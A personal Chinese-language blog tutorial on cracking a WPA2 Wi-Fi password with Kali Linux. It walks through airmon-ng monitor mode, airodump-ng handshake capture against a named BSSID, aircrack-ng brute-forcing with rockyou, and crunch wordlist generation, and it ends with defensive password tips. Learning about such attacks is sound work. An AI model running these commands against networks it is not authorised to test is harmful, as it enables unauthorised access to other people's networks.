題記
大家好啊,我也知道我寫一堆東西也沒啥人看,這只是自娛自樂,但也是鞭策我的一種方式,也是讓我回顧的便捷途徑。這些天一直看大佬講的挖src實戰經驗,也沒時間記筆記。好幾個實戰我都想實操,奈何工具還沒到我手,小米wifi剛到,下一個就是badusb了,在下個就是vps了,我已經迫不及待的准備把我的靶場與想法實現了。真想體驗體驗一鍵上線cs的感覺的。物理黑客也是黑客(哼)。不斷學習,我將會是中國最偉大的黑客(中二臉)。是真的,我越來越認為網安是我們越來越重視的東西,這東西我們落下美國太多年了,加強網安建設自我輩開始。
一、准備工作
1、usb無線網卡,我買的小米隨身wifi,即插即用,不用安裝驅動。
2、vm服務全部開啟。
3、kali設為橋接模式,橋接模式依賴的是網卡。
二、操作步驟
1、開啟虛擬機,把kali上線。
2、插入酷似usb的隨身wifi。
3、ifconfig看一下網卡接口,名字一般是wlan0.
4、開啟無線網卡監聽模式
airmon-ng start wlan0,之后在查看網卡接口,發現名字變了。
5、查看周圍網絡
airodump-ng wlan0mon
中間這個是目標wifi,抓到wifi就Ctrl+c停止。這時候需要注意的是此wifi的信道為3,所以我們要把網卡監聽信道調成3,airodump-ng wlan0mon -c 3。
6、創建一個目錄,用來存放抓到的握手包文件。
mkdir pojie
7、開始抓包
airodump-ng -c 3 --bssid B8:3A:08:C5:88:71 -w pojie/ wlan0mon 注意:信道不能錯,文件抓到包后會存在pojie目錄下,生成一個-01.cap文件。
8、另開一個窗口進行攻擊,使鏈接wifi的設備重連wifi,我們抓取中間包。
9、回到之前窗口我們可以看到成功抓到包了。
10、結束掉抓包后開始暴力破解。
aircrack-ng -a2 -b B8:3A:08:C5:88:71 -w /usr/share/wordlists/rockyou.txt pojie/-01.cap
注意:初次使用字典需要解壓。
gzip -d /usr/share/wordlists/rockyou.txt.gz
或者自己傳一個字典去干爆密碼。
11、破解成功圖如下(密碼被打馬賽克,其實不重要,總不能來我家蹭網吧)。
12、關閉網卡監聽模式,然后就能上網了。
airmon-ng stop wlan0mon
三、爆破字典
1、在kali里,是默認自帶了字典的,分別放在下面三個文件中:
/usr/share/wordlist
/usr/share/wfuzz/wordlist
/usr/share/seclists,有一個password
2、生成一個指定文件名的密碼文件,密碼長度為1到8位
crunch 1 8 123456 -o mimam/mima.txt
3、自己網上搜集搜集,好字典才是王道。
四、注意事項
1、防止這種攻擊最簡單的方法是設置賊復雜賊長的密碼;
2、不要使用WEP加密方式,非常容易被破解;
3、監聽信道和wifi信道一定要保持一致。
參考鏈接:https://mp.weixin.qq.com/s/VuQ0eIm1zTuP5bzYGvFmBQ